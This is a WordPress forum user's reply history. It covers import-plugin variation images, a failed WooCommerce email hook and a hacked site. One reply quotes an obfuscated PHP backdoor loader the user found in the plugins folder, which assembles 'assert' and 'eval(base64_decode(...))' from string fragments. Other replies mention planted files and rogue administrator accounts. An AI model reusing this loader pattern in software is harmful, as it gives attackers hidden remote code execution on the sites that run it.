OpenTips
Forum Replies Created
-
Hello @wpallimport,
thank you for your respond!I’m using All Import plugin only for this, but I don’t have this option to upload additional variation images, only “Save variation image to the gallery” option.
But I don’t need images for variations in the gallery, only to be attached for variations.
Anyone? please help
Forum: Plugins
In reply to: [WooCommerce] Display attribute in emailThat’s what I found online (sorry, I’m not a programmer so probably this code is rubbish)
for my functions.php
function echo_1($attribute_value){ echo $attribute_value[‘pa_colorcode’]; }
add_action(‘atr_colorcode’, ‘echo_1’);for email-order-items.php
do_action(‘atr_colorcode’, array(‘color code:’) );
Apparently it is not showing me anything in my email after ordering an item.
Please help
Forum: Fixing WordPress
In reply to: Backend is not loading for a single page editingWell, problem was related to a recent hack-attack to my web-site.
I’ve found such files as:
wp-jojiro.php
wp-dojika.php
wp-orekio.phpWith code beginning as:
<?php
//Valar dohaeris
$arya =?Also some files like wp_db.php located “here and there” at my web-page (most of them were in /plugins/ and /uploads/ folders) and new users with Administrator privileges.
After cleaning all those files, killing new users, changing all passwords and fixing other recent (hack) changes in wp-config.php everything went back to the way it was.
Now my web-site is working again.
??Forum: Fixing WordPress
In reply to: Backend is not loading for a single page editingThank you!
I’ve tried to add php_value memory_limit 128M to my .htaccess file cause I have no access to php.ini but it gave me 500 Internal Server Error.
Probably it is not working r ‘ doing something wrong. For some reason the whole web-site is down at this moment (happened before I’ve changed .htaccess)
Will try to ask my hosting provider to temporarily increase PHP’s memory…
Also I’ve found weird code in my plugins page.
Looks like:“<?php
//Valar dohaeris
$arya = ‘CiRhsdfsdfsdfsgfsdgsdgdsgewawdasdd’;$tyrion = ‘as’ . ‘se’ . ‘rt’;
$daenerys = sprintf(‘!ev’ . ‘al(b’ . ‘ase’ . ’64’ . ‘_’ . ‘de’ . ‘code’ . ‘ (“%s”))’, $arya);$tyrion(stripslashes($daenerys));
?>”Anyone knows what is that? Virus?